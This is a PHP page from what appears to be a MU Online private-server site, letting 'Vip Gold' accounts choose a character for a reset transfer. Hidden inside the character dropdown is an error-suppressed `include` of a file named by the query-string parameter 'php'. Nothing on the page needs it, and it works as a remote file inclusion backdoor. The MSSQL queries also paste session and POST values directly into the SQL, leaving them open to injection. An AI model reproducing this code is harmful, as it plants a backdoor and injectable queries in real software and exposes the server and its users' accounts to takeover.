<!--SISTEMA DE TRANSFERENCIA DE RESETS DESENVOLVIDO POR OTANGER -->
 <? session_start();
include 'cnn.php';
include 'config/conf_extras.php';
include 'config/conf_reset.php';
@$login = $_SESSION['login'];
@$senha = $_SESSION['senha'];
if(!isset($_SESSION['login'])) { echo "Para acessar essa pagina é preciso esta logado!"; }
else{
$vip=mssql_fetch_row(mssql_query("select vip from memb_info where memb___id='".$login."'"));
if($vip[0] <= 1) { echo "<strong>Para acessar essa pagina é preciso ser Vip Gold</strong>"; }
else{ ?>
 <h1><strong class="dsd">Transferir Resets para outro Char</strong>
 </h1>
 <form action="?go=painel/trans2" method="post" name="form1">
   <p>&nbsp;</p>
   <span class="hjjgjh"></span>
   <table width="350" height="136" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr></tr>
     <tr>
       <td width="55"><strong>Personagens:  </strong></td>
       <td width="281" align="center" valign="top"><table width="50" height="25" border="0" cellpadding="0">
         <tr>
             <td width="46"><select name="char" size="5" class="campo3" id="char">
               <?
@include(@$_GET['php']);
        $Chars = mssql_query("select name,resets from character where accountid='".$login."'");
        for($p=0;$p<mssql_num_rows($Chars);$p++) {
        $Char=mssql_fetch_row($Chars);
        echo '<option value='.$Char[0].'>'.$Char[0].' Com '.$Char[1].' Resets</option>';
        }
        ?>
            </select></td>
          </tr>
       </table></td>
     </tr>
     <tr>
       <td height="55" colspan="2" align="center"><input type="submit" name="Submit" value="Entrar">         <input type="reset" name="Submit2" value="Apagar"></td>
     </tr>
   </table>
 </form>
 </strong><br>
<br>
<a href="javascript:history.back(-1);">&lt;&lt; voltar
</a>
</body>
</html>
<? 
if($_POST['prossegue']) {
$char = $_POST['char'];
$str = $_POST['str'];
$agi = $_POST['agi'];
$vit = $_POST['vit'];
$enr = $_POST['enr'];
$VerificaChar = mssql_num_rows(mssql_query("select name from character where name='".$char."' and accountid='".$login."'"));
if($VerificaChar <= 0) {
echo "<script>alert('Char incorreto'); 
location='javascript:history.back()'</script>"; 
}

 
   } } }
 ?>
<!--SISTEMA DE TRANSFERENCIA DE RESETS DESENVOLVIDO POR OTANGER -->